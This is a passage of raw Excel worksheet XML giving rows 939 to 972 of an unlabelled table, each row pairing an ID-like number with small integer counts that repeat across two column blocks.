        <v>2547</v>
      </c>
      <c r="B939" s="8">
        <v>6</v>
      </c>
      <c r="C939" s="8">
        <v>1</v>
      </c>
      <c r="D939" s="8">
        <v>45</v>
      </c>
      <c r="E939" s="8">
        <v>53</v>
      </c>
      <c r="F939" s="8">
        <v>22</v>
      </c>
      <c r="G939" s="8">
        <v>14</v>
      </c>
      <c r="H939" s="8">
        <v>141</v>
      </c>
      <c r="K939" s="7">
        <v>2547</v>
      </c>
      <c r="L939" s="8">
        <v>6</v>
      </c>
      <c r="M939" s="8">
        <v>1</v>
      </c>
      <c r="N939" s="8">
        <v>45</v>
      </c>
      <c r="O939" s="8">
        <v>53</v>
      </c>
      <c r="P939" s="8">
        <v>22</v>
      </c>
      <c r="Q939" s="8">
        <v>14</v>
      </c>
    </row>
    <row r="940" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A940" s="7">
        <v>2550</v>
      </c>
      <c r="B940" s="8">
        <v>0</v>
      </c>
      <c r="C940" s="8">
        <v>0</v>
      </c>
      <c r="D940" s="8">
        <v>0</v>
      </c>
      <c r="E940" s="8">
        <v>0</v>
      </c>
      <c r="F940" s="8">
        <v>11</v>
      </c>
      <c r="G940" s="8">
        <v>7</v>
      </c>
      <c r="H940" s="8">
        <v>18</v>
      </c>
      <c r="K940" s="7">
        <v>2550</v>
      </c>
      <c r="L940" s="8">
        <v>0</v>
      </c>
      <c r="M940" s="8">
        <v>0</v>
      </c>
      <c r="N940" s="8">
        <v>0</v>
      </c>
      <c r="O940" s="8">
        <v>0</v>
      </c>
      <c r="P940" s="8">
        <v>11</v>
      </c>
      <c r="Q940" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="941" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A941" s="7">
        <v>2553</v>
      </c>
      <c r="B941" s="8">
        <v>26</v>
      </c>
      <c r="C941" s="8">
        <v>1</v>
      </c>
      <c r="D941" s="8">
        <v>86</v>
      </c>
      <c r="E941" s="8">
        <v>300</v>
      </c>
      <c r="F941" s="8">
        <v>25</v>
      </c>
      <c r="G941" s="8">
        <v>35</v>
      </c>
      <c r="H941" s="8">
        <v>473</v>
      </c>
      <c r="K941" s="7">
        <v>2553</v>
      </c>
      <c r="L941" s="8">
        <v>26</v>
      </c>
      <c r="M941" s="8">
        <v>1</v>
      </c>
      <c r="N941" s="8">
        <v>86</v>
      </c>
      <c r="O941" s="8">
        <v>300</v>
      </c>
      <c r="P941" s="8">
        <v>25</v>
      </c>
      <c r="Q941" s="8">
        <v>35</v>
      </c>
    </row>
    <row r="942" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A942" s="7">
        <v>2554</v>
      </c>
      <c r="B942" s="8">
        <v>0</v>
      </c>
      <c r="C942" s="8">
        <v>0</v>
      </c>
      <c r="D942" s="8">
        <v>17</v>
      </c>
      <c r="E942" s="8">
        <v>25</v>
      </c>
      <c r="F942" s="8">
        <v>3</v>
      </c>
      <c r="G942" s="8">
        <v>10</v>
      </c>
      <c r="H942" s="8">
        <v>55</v>
      </c>
      <c r="K942" s="7">
        <v>2554</v>
      </c>
      <c r="L942" s="8">
        <v>0</v>
      </c>
      <c r="M942" s="8">
        <v>0</v>
      </c>
      <c r="N942" s="8">
        <v>17</v>
      </c>
      <c r="O942" s="8">
        <v>25</v>
      </c>
      <c r="P942" s="8">
        <v>3</v>
      </c>
      <c r="Q942" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="943" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A943" s="7">
        <v>2555</v>
      </c>
      <c r="B943" s="8">
        <v>22</v>
      </c>
      <c r="C943" s="8">
        <v>2</v>
      </c>
      <c r="D943" s="8">
        <v>33</v>
      </c>
      <c r="E943" s="8">
        <v>2</v>
      </c>
      <c r="F943" s="8">
        <v>11</v>
      </c>
      <c r="G943" s="8">
        <v>2</v>
      </c>
      <c r="H943" s="8">
        <v>72</v>
      </c>
      <c r="K943" s="7">
        <v>2555</v>
      </c>
      <c r="L943" s="8">
        <v>22</v>
      </c>
      <c r="M943" s="8">
        <v>2</v>
      </c>
      <c r="N943" s="8">
        <v>33</v>
      </c>
      <c r="O943" s="8">
        <v>2</v>
      </c>
      <c r="P943" s="8">
        <v>11</v>
      </c>
      <c r="Q943" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="944" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A944" s="7">
        <v>2557</v>
      </c>
      <c r="B944" s="8">
        <v>26</v>
      </c>
      <c r="C944" s="8">
        <v>1</v>
      </c>
      <c r="D944" s="8">
        <v>0</v>
      </c>
      <c r="E944" s="8">
        <v>0</v>
      </c>
      <c r="F944" s="8">
        <v>157</v>
      </c>
      <c r="G944" s="8">
        <v>144</v>
      </c>
      <c r="H944" s="8">
        <v>328</v>
      </c>
      <c r="K944" s="7">
        <v>2557</v>
      </c>
      <c r="L944" s="8">
        <v>26</v>
      </c>
      <c r="M944" s="8">
        <v>1</v>
      </c>
      <c r="N944" s="8">
        <v>0</v>
      </c>
      <c r="O944" s="8">
        <v>0</v>
      </c>
      <c r="P944" s="8">
        <v>157</v>
      </c>
      <c r="Q944" s="8">
        <v>144</v>
      </c>
    </row>
    <row r="945" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A945" s="7">
        <v>2558</v>
      </c>
      <c r="B945" s="8">
        <v>0</v>
      </c>
      <c r="C945" s="8">
        <v>0</v>
      </c>
      <c r="D945" s="8">
        <v>25</v>
      </c>
      <c r="E945" s="8">
        <v>85</v>
      </c>
      <c r="F945" s="8">
        <v>10</v>
      </c>
      <c r="G945" s="8">
        <v>25</v>
      </c>
      <c r="H945" s="8">
        <v>145</v>
      </c>
      <c r="K945" s="7">
        <v>2558</v>
      </c>
      <c r="L945" s="8">
        <v>0</v>
      </c>
      <c r="M945" s="8">
        <v>0</v>
      </c>
      <c r="N945" s="8">
        <v>25</v>
      </c>
      <c r="O945" s="8">
        <v>85</v>
      </c>
      <c r="P945" s="8">
        <v>10</v>
      </c>
      <c r="Q945" s="8">
        <v>25</v>
      </c>
    </row>
    <row r="946" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A946" s="7">
        <v>2559</v>
      </c>
      <c r="B946" s="8">
        <v>7</v>
      </c>
      <c r="C946" s="8">
        <v>0</v>
      </c>
      <c r="D946" s="8">
        <v>0</v>
      </c>
      <c r="E946" s="8">
        <v>0</v>
      </c>
      <c r="F946" s="8">
        <v>8</v>
      </c>
      <c r="G946" s="8">
        <v>1</v>
      </c>
      <c r="H946" s="8">
        <v>16</v>
      </c>
      <c r="K946" s="7">
        <v>2559</v>
      </c>
      <c r="L946" s="8">
        <v>7</v>
      </c>
      <c r="M946" s="8">
        <v>0</v>
      </c>
      <c r="N946" s="8">
        <v>0</v>
      </c>
      <c r="O946" s="8">
        <v>0</v>
      </c>
      <c r="P946" s="8">
        <v>8</v>
      </c>
      <c r="Q946" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="947" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A947" s="7">
        <v>2560</v>
      </c>
      <c r="B947" s="8">
        <v>25</v>
      </c>
      <c r="C947" s="8">
        <v>1</v>
      </c>
      <c r="D947" s="8">
        <v>0</v>
      </c>
      <c r="E947" s="8">
        <v>400</v>
      </c>
      <c r="F947" s="8">
        <v>10</v>
      </c>
      <c r="G947" s="8">
        <v>24</v>
      </c>
      <c r="H947" s="8">
        <v>460</v>
      </c>
      <c r="K947" s="7">
        <v>2560</v>
      </c>
      <c r="L947" s="8">
        <v>25</v>
      </c>
      <c r="M947" s="8">
        <v>1</v>
      </c>
      <c r="N947" s="8">
        <v>0</v>
      </c>
      <c r="O947" s="8">
        <v>400</v>
      </c>
      <c r="P947" s="8">
        <v>10</v>
      </c>
      <c r="Q947" s="8">
        <v>24</v>
      </c>
    </row>
    <row r="948" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A948" s="7">
        <v>2561</v>
      </c>
      <c r="B948" s="8">
        <v>25</v>
      </c>
      <c r="C948" s="8">
        <v>1</v>
      </c>
      <c r="D948" s="8">
        <v>3</v>
      </c>
      <c r="E948" s="8">
        <v>7</v>
      </c>
      <c r="F948" s="8">
        <v>3</v>
      </c>
      <c r="G948" s="8">
        <v>1</v>
      </c>
      <c r="H948" s="8">
        <v>40</v>
      </c>
      <c r="K948" s="7">
        <v>2561</v>
      </c>
      <c r="L948" s="8">
        <v>25</v>
      </c>
      <c r="M948" s="8">
        <v>1</v>
      </c>
      <c r="N948" s="8">
        <v>3</v>
      </c>
      <c r="O948" s="8">
        <v>7</v>
      </c>
      <c r="P948" s="8">
        <v>3</v>
      </c>
      <c r="Q948" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="949" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A949" s="7">
        <v>2562</v>
      </c>
      <c r="B949" s="8">
        <v>26</v>
      </c>
      <c r="C949" s="8">
        <v>3</v>
      </c>
      <c r="D949" s="8">
        <v>555</v>
      </c>
      <c r="E949" s="8">
        <v>476</v>
      </c>
      <c r="F949" s="8">
        <v>144</v>
      </c>
      <c r="G949" s="8">
        <v>129</v>
      </c>
      <c r="H949" s="8">
        <v>1333</v>
      </c>
      <c r="K949" s="7">
        <v>2562</v>
      </c>
      <c r="L949" s="8">
        <v>26</v>
      </c>
      <c r="M949" s="8">
        <v>3</v>
      </c>
      <c r="N949" s="8">
        <v>555</v>
      </c>
      <c r="O949" s="8">
        <v>476</v>
      </c>
      <c r="P949" s="8">
        <v>144</v>
      </c>
      <c r="Q949" s="8">
        <v>129</v>
      </c>
    </row>
    <row r="950" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A950" s="7">
        <v>2563</v>
      </c>
      <c r="B950" s="8">
        <v>0</v>
      </c>
      <c r="C950" s="8">
        <v>0</v>
      </c>
      <c r="D950" s="8">
        <v>0</v>
      </c>
      <c r="E950" s="8">
        <v>0</v>
      </c>
      <c r="F950" s="8">
        <v>9</v>
      </c>
      <c r="G950" s="8">
        <v>1</v>
      </c>
      <c r="H950" s="8">
        <v>10</v>
      </c>
      <c r="K950" s="7">
        <v>2563</v>
      </c>
      <c r="L950" s="8">
        <v>0</v>
      </c>
      <c r="M950" s="8">
        <v>0</v>
      </c>
      <c r="N950" s="8">
        <v>0</v>
      </c>
      <c r="O950" s="8">
        <v>0</v>
      </c>
      <c r="P950" s="8">
        <v>9</v>
      </c>
      <c r="Q950" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="951" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A951" s="7">
        <v>2564</v>
      </c>
      <c r="B951" s="8">
        <v>0</v>
      </c>
      <c r="C951" s="8">
        <v>0</v>
      </c>
      <c r="D951" s="8">
        <v>6</v>
      </c>
      <c r="E951" s="8">
        <v>0</v>
      </c>
      <c r="F951" s="8">
        <v>0</v>
      </c>
      <c r="G951" s="8">
        <v>1</v>
      </c>
      <c r="H951" s="8">
        <v>7</v>
      </c>
      <c r="K951" s="7">
        <v>2564</v>
      </c>
      <c r="L951" s="8">
        <v>0</v>
      </c>
      <c r="M951" s="8">
        <v>0</v>
      </c>
      <c r="N951" s="8">
        <v>6</v>
      </c>
      <c r="O951" s="8">
        <v>0</v>
      </c>
      <c r="P951" s="8">
        <v>0</v>
      </c>
      <c r="Q951" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="952" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A952" s="7">
        <v>2568</v>
      </c>
      <c r="B952" s="8">
        <v>20</v>
      </c>
      <c r="C952" s="8">
        <v>1</v>
      </c>
      <c r="D952" s="8">
        <v>10</v>
      </c>
      <c r="E952" s="8">
        <v>25</v>
      </c>
      <c r="F952" s="8">
        <v>6</v>
      </c>
      <c r="G952" s="8">
        <v>1</v>
      </c>
      <c r="H952" s="8">
        <v>63</v>
      </c>
      <c r="K952" s="7">
        <v>2568</v>
      </c>
      <c r="L952" s="8">
        <v>20</v>
      </c>
      <c r="M952" s="8">
        <v>1</v>
      </c>
      <c r="N952" s="8">
        <v>10</v>
      </c>
      <c r="O952" s="8">
        <v>25</v>
      </c>
      <c r="P952" s="8">
        <v>6</v>
      </c>
      <c r="Q952" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="953" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A953" s="7">
        <v>2569</v>
      </c>
      <c r="B953" s="8">
        <v>1</v>
      </c>
      <c r="C953" s="8">
        <v>1</v>
      </c>
      <c r="D953" s="8">
        <v>17</v>
      </c>
      <c r="E953" s="8">
        <v>65</v>
      </c>
      <c r="F953" s="8">
        <v>11</v>
      </c>
      <c r="G953" s="8">
        <v>50</v>
      </c>
      <c r="H953" s="8">
        <v>145</v>
      </c>
      <c r="K953" s="7">
        <v>2569</v>
      </c>
      <c r="L953" s="8">
        <v>1</v>
      </c>
      <c r="M953" s="8">
        <v>1</v>
      </c>
      <c r="N953" s="8">
        <v>17</v>
      </c>
      <c r="O953" s="8">
        <v>65</v>
      </c>
      <c r="P953" s="8">
        <v>11</v>
      </c>
      <c r="Q953" s="8">
        <v>50</v>
      </c>
    </row>
    <row r="954" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A954" s="7">
        <v>2571</v>
      </c>
      <c r="B954" s="8">
        <v>6</v>
      </c>
      <c r="C954" s="8">
        <v>1</v>
      </c>
      <c r="D954" s="8">
        <v>16</v>
      </c>
      <c r="E954" s="8">
        <v>13</v>
      </c>
      <c r="F954" s="8">
        <v>5</v>
      </c>
      <c r="G954" s="8">
        <v>5</v>
      </c>
      <c r="H954" s="8">
        <v>46</v>
      </c>
      <c r="K954" s="7">
        <v>2571</v>
      </c>
      <c r="L954" s="8">
        <v>6</v>
      </c>
      <c r="M954" s="8">
        <v>1</v>
      </c>
      <c r="N954" s="8">
        <v>16</v>
      </c>
      <c r="O954" s="8">
        <v>13</v>
      </c>
      <c r="P954" s="8">
        <v>5</v>
      </c>
      <c r="Q954" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="955" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A955" s="7">
        <v>2572</v>
      </c>
      <c r="B955" s="8">
        <v>22</v>
      </c>
      <c r="C955" s="8">
        <v>1</v>
      </c>
      <c r="D955" s="8">
        <v>0</v>
      </c>
      <c r="E955" s="8">
        <v>0</v>
      </c>
      <c r="F955" s="8">
        <v>2</v>
      </c>
      <c r="G955" s="8">
        <v>3</v>
      </c>
      <c r="H955" s="8">
        <v>28</v>
      </c>
      <c r="K955" s="7">
        <v>2572</v>
      </c>
      <c r="L955" s="8">
        <v>22</v>
      </c>
      <c r="M955" s="8">
        <v>1</v>
      </c>
      <c r="N955" s="8">
        <v>0</v>
      </c>
      <c r="O955" s="8">
        <v>0</v>
      </c>
      <c r="P955" s="8">
        <v>2</v>
      </c>
      <c r="Q955" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="956" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A956" s="7">
        <v>2573</v>
      </c>
      <c r="B956" s="8">
        <v>25</v>
      </c>
      <c r="C956" s="8">
        <v>2</v>
      </c>
      <c r="D956" s="8">
        <v>7</v>
      </c>
      <c r="E956" s="8">
        <v>0</v>
      </c>
      <c r="F956" s="8">
        <v>3</v>
      </c>
      <c r="G956" s="8">
        <v>3</v>
      </c>
      <c r="H956" s="8">
        <v>40</v>
      </c>
      <c r="K956" s="7">
        <v>2573</v>
      </c>
      <c r="L956" s="8">
        <v>25</v>
      </c>
      <c r="M956" s="8">
        <v>2</v>
      </c>
      <c r="N956" s="8">
        <v>7</v>
      </c>
      <c r="O956" s="8">
        <v>0</v>
      </c>
      <c r="P956" s="8">
        <v>3</v>
      </c>
      <c r="Q956" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="957" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A957" s="7">
        <v>2574</v>
      </c>
      <c r="B957" s="8">
        <v>0</v>
      </c>
      <c r="C957" s="8">
        <v>0</v>
      </c>
      <c r="D957" s="8">
        <v>10</v>
      </c>
      <c r="E957" s="8">
        <v>2</v>
      </c>
      <c r="F957" s="8">
        <v>4</v>
      </c>
      <c r="G957" s="8">
        <v>0</v>
      </c>
      <c r="H957" s="8">
        <v>16</v>
      </c>
      <c r="K957" s="7">
        <v>2574</v>
      </c>
      <c r="L957" s="8">
        <v>0</v>
      </c>
      <c r="M957" s="8">
        <v>0</v>
      </c>
      <c r="N957" s="8">
        <v>10</v>
      </c>
      <c r="O957" s="8">
        <v>2</v>
      </c>
      <c r="P957" s="8">
        <v>4</v>
      </c>
      <c r="Q957" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="958" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A958" s="7">
        <v>2576</v>
      </c>
      <c r="B958" s="8">
        <v>28</v>
      </c>
      <c r="C958" s="8">
        <v>0</v>
      </c>
      <c r="D958" s="8">
        <v>0</v>
      </c>
      <c r="E958" s="8">
        <v>0</v>
      </c>
      <c r="F958" s="8">
        <v>23</v>
      </c>
      <c r="G958" s="8">
        <v>2</v>
      </c>
      <c r="H958" s="8">
        <v>53</v>
      </c>
      <c r="K958" s="7">
        <v>2576</v>
      </c>
      <c r="L958" s="8">
        <v>28</v>
      </c>
      <c r="M958" s="8">
        <v>0</v>
      </c>
      <c r="N958" s="8">
        <v>0</v>
      </c>
      <c r="O958" s="8">
        <v>0</v>
      </c>
      <c r="P958" s="8">
        <v>23</v>
      </c>
      <c r="Q958" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="959" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A959" s="7">
        <v>2577</v>
      </c>
      <c r="B959" s="8">
        <v>26</v>
      </c>
      <c r="C959" s="8">
        <v>1</v>
      </c>
      <c r="D959" s="8">
        <v>18</v>
      </c>
      <c r="E959" s="8">
        <v>7</v>
      </c>
      <c r="F959" s="8">
        <v>10</v>
      </c>
      <c r="G959" s="8">
        <v>11</v>
      </c>
      <c r="H959" s="8">
        <v>73</v>
      </c>
      <c r="K959" s="7">
        <v>2577</v>
      </c>
      <c r="L959" s="8">
        <v>26</v>
      </c>
      <c r="M959" s="8">
        <v>1</v>
      </c>
      <c r="N959" s="8">
        <v>18</v>
      </c>
      <c r="O959" s="8">
        <v>7</v>
      </c>
      <c r="P959" s="8">
        <v>10</v>
      </c>
      <c r="Q959" s="8">
        <v>11</v>
      </c>
    </row>
    <row r="960" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A960" s="7">
        <v>2578</v>
      </c>
      <c r="B960" s="8">
        <v>27</v>
      </c>
      <c r="C960" s="8">
        <v>1</v>
      </c>
      <c r="D960" s="8">
        <v>0</v>
      </c>
      <c r="E960" s="8">
        <v>0</v>
      </c>
      <c r="F960" s="8">
        <v>12</v>
      </c>
      <c r="G960" s="8">
        <v>6</v>
      </c>
      <c r="H960" s="8">
        <v>46</v>
      </c>
      <c r="K960" s="7">
        <v>2578</v>
      </c>
      <c r="L960" s="8">
        <v>27</v>
      </c>
      <c r="M960" s="8">
        <v>1</v>
      </c>
      <c r="N960" s="8">
        <v>0</v>
      </c>
      <c r="O960" s="8">
        <v>0</v>
      </c>
      <c r="P960" s="8">
        <v>12</v>
      </c>
      <c r="Q960" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="961" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A961" s="7">
        <v>2579</v>
      </c>
      <c r="B961" s="8">
        <v>26</v>
      </c>
      <c r="C961" s="8">
        <v>0</v>
      </c>
      <c r="D961" s="8">
        <v>20</v>
      </c>
      <c r="E961" s="8">
        <v>2</v>
      </c>
      <c r="F961" s="8">
        <v>2</v>
      </c>
      <c r="G961" s="8">
        <v>4</v>
      </c>
      <c r="H961" s="8">
        <v>54</v>
      </c>
      <c r="K961" s="7">
        <v>2579</v>
      </c>
      <c r="L961" s="8">
        <v>26</v>
      </c>
      <c r="M961" s="8">
        <v>0</v>
      </c>
      <c r="N961" s="8">
        <v>20</v>
      </c>
      <c r="O961" s="8">
        <v>2</v>
      </c>
      <c r="P961" s="8">
        <v>2</v>
      </c>
      <c r="Q961" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="962" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A962" s="7">
        <v>2580</v>
      </c>
      <c r="B962" s="8">
        <v>26</v>
      </c>
      <c r="C962" s="8">
        <v>1</v>
      </c>
      <c r="D962" s="8">
        <v>10</v>
      </c>
      <c r="E962" s="8">
        <v>5</v>
      </c>
      <c r="F962" s="8">
        <v>9</v>
      </c>
      <c r="G962" s="8">
        <v>4</v>
      </c>
      <c r="H962" s="8">
        <v>55</v>
      </c>
      <c r="K962" s="7">
        <v>2580</v>
      </c>
      <c r="L962" s="8">
        <v>26</v>
      </c>
      <c r="M962" s="8">
        <v>1</v>
      </c>
      <c r="N962" s="8">
        <v>10</v>
      </c>
      <c r="O962" s="8">
        <v>5</v>
      </c>
      <c r="P962" s="8">
        <v>9</v>
      </c>
      <c r="Q962" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="963" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A963" s="7">
        <v>2581</v>
      </c>
      <c r="B963" s="8">
        <v>30</v>
      </c>
      <c r="C963" s="8">
        <v>0</v>
      </c>
      <c r="D963" s="8">
        <v>10</v>
      </c>
      <c r="E963" s="8">
        <v>5</v>
      </c>
      <c r="F963" s="8">
        <v>2</v>
      </c>
      <c r="G963" s="8">
        <v>4</v>
      </c>
      <c r="H963" s="8">
        <v>51</v>
      </c>
      <c r="K963" s="7">
        <v>2581</v>
      </c>
      <c r="L963" s="8">
        <v>30</v>
      </c>
      <c r="M963" s="8">
        <v>0</v>
      </c>
      <c r="N963" s="8">
        <v>10</v>
      </c>
      <c r="O963" s="8">
        <v>5</v>
      </c>
      <c r="P963" s="8">
        <v>2</v>
      </c>
      <c r="Q963" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="964" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A964" s="7">
        <v>2583</v>
      </c>
      <c r="B964" s="8">
        <v>25</v>
      </c>
      <c r="C964" s="8">
        <v>0</v>
      </c>
      <c r="D964" s="8">
        <v>23</v>
      </c>
      <c r="E964" s="8">
        <v>3</v>
      </c>
      <c r="F964" s="8">
        <v>10</v>
      </c>
      <c r="G964" s="8">
        <v>15</v>
      </c>
      <c r="H964" s="8">
        <v>76</v>
      </c>
      <c r="K964" s="7">
        <v>2583</v>
      </c>
      <c r="L964" s="8">
        <v>25</v>
      </c>
      <c r="M964" s="8">
        <v>0</v>
      </c>
      <c r="N964" s="8">
        <v>23</v>
      </c>
      <c r="O964" s="8">
        <v>3</v>
      </c>
      <c r="P964" s="8">
        <v>10</v>
      </c>
      <c r="Q964" s="8">
        <v>15</v>
      </c>
    </row>
    <row r="965" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A965" s="7">
        <v>2585</v>
      </c>
      <c r="B965" s="8">
        <v>24</v>
      </c>
      <c r="C965" s="8">
        <v>1</v>
      </c>
      <c r="D965" s="8">
        <v>1</v>
      </c>
      <c r="E965" s="8">
        <v>2</v>
      </c>
      <c r="F965" s="8">
        <v>3</v>
      </c>
      <c r="G965" s="8">
        <v>3</v>
      </c>
      <c r="H965" s="8">
        <v>34</v>
      </c>
      <c r="K965" s="7">
        <v>2585</v>
      </c>
      <c r="L965" s="8">
        <v>24</v>
      </c>
      <c r="M965" s="8">
        <v>1</v>
      </c>
      <c r="N965" s="8">
        <v>1</v>
      </c>
      <c r="O965" s="8">
        <v>2</v>
      </c>
      <c r="P965" s="8">
        <v>3</v>
      </c>
      <c r="Q965" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="966" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A966" s="7">
        <v>2586</v>
      </c>
      <c r="B966" s="8">
        <v>25</v>
      </c>
      <c r="C966" s="8">
        <v>0</v>
      </c>
      <c r="D966" s="8">
        <v>23</v>
      </c>
      <c r="E966" s="8">
        <v>3</v>
      </c>
      <c r="F966" s="8">
        <v>20</v>
      </c>
      <c r="G966" s="8">
        <v>15</v>
      </c>
      <c r="H966" s="8">
        <v>86</v>
      </c>
      <c r="K966" s="7">
        <v>2586</v>
      </c>
      <c r="L966" s="8">
        <v>25</v>
      </c>
      <c r="M966" s="8">
        <v>0</v>
      </c>
      <c r="N966" s="8">
        <v>23</v>
      </c>
      <c r="O966" s="8">
        <v>3</v>
      </c>
      <c r="P966" s="8">
        <v>20</v>
      </c>
      <c r="Q966" s="8">
        <v>15</v>
      </c>
    </row>
    <row r="967" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A967" s="7">
        <v>2588</v>
      </c>
      <c r="B967" s="8">
        <v>24</v>
      </c>
      <c r="C967" s="8">
        <v>1</v>
      </c>
      <c r="D967" s="8">
        <v>29</v>
      </c>
      <c r="E967" s="8">
        <v>1</v>
      </c>
      <c r="F967" s="8">
        <v>13</v>
      </c>
      <c r="G967" s="8">
        <v>4</v>
      </c>
      <c r="H967" s="8">
        <v>72</v>
      </c>
      <c r="K967" s="7">
        <v>2588</v>
      </c>
      <c r="L967" s="8">
        <v>24</v>
      </c>
      <c r="M967" s="8">
        <v>1</v>
      </c>
      <c r="N967" s="8">
        <v>29</v>
      </c>
      <c r="O967" s="8">
        <v>1</v>
      </c>
      <c r="P967" s="8">
        <v>13</v>
      </c>
      <c r="Q967" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="968" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A968" s="7">
        <v>2589</v>
      </c>
      <c r="B968" s="8">
        <v>0</v>
      </c>
      <c r="C968" s="8">
        <v>0</v>
      </c>
      <c r="D968" s="8">
        <v>0</v>
      </c>
      <c r="E968" s="8">
        <v>0</v>
      </c>
      <c r="F968" s="8">
        <v>3</v>
      </c>
      <c r="G968" s="8">
        <v>0</v>
      </c>
      <c r="H968" s="8">
        <v>3</v>
      </c>
      <c r="K968" s="7">
        <v>2589</v>
      </c>
      <c r="L968" s="8">
        <v>0</v>
      </c>
      <c r="M968" s="8">
        <v>0</v>
      </c>
      <c r="N968" s="8">
        <v>0</v>
      </c>
      <c r="O968" s="8">
        <v>0</v>
      </c>
      <c r="P968" s="8">
        <v>3</v>
      </c>
      <c r="Q968" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="969" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A969" s="7">
        <v>2590</v>
      </c>
      <c r="B969" s="8">
        <v>25</v>
      </c>
      <c r="C969" s="8">
        <v>2</v>
      </c>
      <c r="D969" s="8">
        <v>36</v>
      </c>
      <c r="E969" s="8">
        <v>96</v>
      </c>
      <c r="F969" s="8">
        <v>15</v>
      </c>
      <c r="G969" s="8">
        <v>6</v>
      </c>
      <c r="H969" s="8">
        <v>180</v>
      </c>
      <c r="K969" s="7">
        <v>2590</v>
      </c>
      <c r="L969" s="8">
        <v>25</v>
      </c>
      <c r="M969" s="8">
        <v>2</v>
      </c>
      <c r="N969" s="8">
        <v>36</v>
      </c>
      <c r="O969" s="8">
        <v>96</v>
      </c>
      <c r="P969" s="8">
        <v>15</v>
      </c>
      <c r="Q969" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="970" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A970" s="7">
        <v>2591</v>
      </c>
      <c r="B970" s="8">
        <v>25</v>
      </c>
      <c r="C970" s="8">
        <v>1</v>
      </c>
      <c r="D970" s="8">
        <v>0</v>
      </c>
      <c r="E970" s="8">
        <v>0</v>
      </c>
      <c r="F970" s="8">
        <v>14</v>
      </c>
      <c r="G970" s="8">
        <v>2</v>
      </c>
      <c r="H970" s="8">
        <v>42</v>
      </c>
      <c r="K970" s="7">
        <v>2591</v>
      </c>
      <c r="L970" s="8">
        <v>25</v>
      </c>
      <c r="M970" s="8">
        <v>1</v>
      </c>
      <c r="N970" s="8">
        <v>0</v>
      </c>
      <c r="O970" s="8">
        <v>0</v>
      </c>
      <c r="P970" s="8">
        <v>14</v>
      </c>
      <c r="Q970" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="971" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A971" s="7">
        <v>2594</v>
      </c>
      <c r="B971" s="8">
        <v>24</v>
      </c>
      <c r="C971" s="8">
        <v>0</v>
      </c>
      <c r="D971" s="8">
        <v>0</v>
      </c>
      <c r="E971" s="8">
        <v>5</v>
      </c>
      <c r="F971" s="8">
        <v>2</v>
      </c>
      <c r="G971" s="8">
        <v>4</v>
      </c>
      <c r="H971" s="8">
        <v>35</v>
      </c>
      <c r="K971" s="7">
        <v>2594</v>
      </c>
      <c r="L971" s="8">
        <v>24</v>
      </c>
      <c r="M971" s="8">
        <v>0</v>
      </c>
      <c r="N971" s="8">
        <v>0</v>
      </c>
      <c r="O971" s="8">
        <v>5</v>
      </c>
      <c r="P971" s="8">
        <v>2</v>
      </c>
      <c r="Q971" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="972" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A972" s="7">
        <v>2596</v>
      </c>
      <c r="B972" s="8">
        <v>26</v>
      </c>
      <c r="C972" s="8">
        <v>1</v>
      </c>
      <c r="D972" s="8">
        <v>4</v>
      </c>
      <c r="E972" s="8">
        <v>25</v>
      </c>
      <c r="F972" s="8">
        <v>13</v>
      </c>
      <c r="G972" s="8">
        <v>19</v>
      </c>
      <c r="H972" s="8">
        <v>88</v>
      </c>
      <c r="K972" s="7">
        <v>2596</v>
      </c>
      <c r="L972" s="8">
        <v>26</v>
      </c>
      <c r="M972" s="8">
        <v>1</v>
      </c>
      <c r="N972" s="8">
        <v>4</v>
      </c>
      <c r="O972" s="8">
        <v>25</v>
      </c>
      <c r="P972" s="8">
        <v>13</v>
      </c>
